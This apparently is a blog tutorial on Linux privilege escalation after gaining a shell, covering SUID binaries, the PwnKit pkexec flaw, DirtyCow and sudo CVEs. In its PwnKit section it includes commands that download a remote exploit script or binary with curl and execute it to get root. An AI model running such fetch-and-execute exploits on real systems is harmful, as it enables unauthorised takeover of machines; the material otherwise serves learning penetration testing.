Post-Exploitation Part 1: Privilege Escalation
Getting a shell is just a foothold. This is the first in a two-part series covering what comes next — SUID abuse, kernel exploits, and sudo misconfigurations that turn a low-priv user into root.
Privilege Escalation
This article assumes familiarity with post-exploitation fundamentals. We're skipping the basics and going straight into the techniques attackers use to escalate from a low-privilege shell to root.
Privilege escalation exploits flaws in the system — misconfigurations, vulnerable binaries, kernel bugs — to gain higher access than intended. The three major vectors on Linux:
- SUID binary abuse
- Kernel vulnerabilities
- Sudo misconfigurations and CVEs
SUID Binaries
The SUID (Set User ID) bit allows executables to run with the permissions of the file owner — typically root. Any binary with the SUID bit set is a potential escalation vector if it can be abused to spawn shells or read/write privileged files.
Finding SUID Binaries
# Find all SUID binaries on the system
find / -perm -u=s -type f 2>/dev/null
This searches from root, matches files with the SUID bit (-perm -u=s),
filters to regular files, and suppresses permission errors. Cross-reference results
with GTFOBins to identify exploitable binaries.
PwnKit — pkexec Exploitation
If pkexec is present, CVE-2021-4034 (PwnKit) offers a reliable
escalation path on many Linux distributions.
# Quick exploit sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)" # Manual approach curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit chmod +x ./PwnKit ./PwnKit --interactive
Kernel Vulnerabilities
DirtyCow (CVE-2016-5195)
A classic kernel race condition exploiting the Copy-On-Write (COW) mechanism. The
kernel's memory optimization — deferring page copies until modification — can be
raced to write to read-only memory mappings, including privileged files like
/etc/passwd.
This showed up constantly in older CTF machines and real-world engagements. If the kernel version is vulnerable, it's often the fastest path to root.
Sudo Vulnerabilities
sudo allows permitted users to execute commands as root. Most sudo
vulnerabilities stem from implementation flaws or misconfigurations — the
NOPASSWD directive being one of the most commonly abused.
Notable CVEs
- CVE-2021-3156 (Baron Samedit) — heap-based buffer overflow in sudo's argument parsing
- CVE-2025-32463 — chroot bypass via NSS library injection in
sudo -R
I maintain PoCs for several of these vulnerabilities — check the GitHub repos for exploit code and detection scripts.
Conclusion
A shell is just a foothold. What matters is what you do with it. Privilege escalation exists because of misconfigurations, bad assumptions, and trust placed in the wrong components. Enumeration and awareness are everything — a shell gives you access, but knowledge gives you control.
Part 2 covers pivoting — moving laterally through networks once you have root.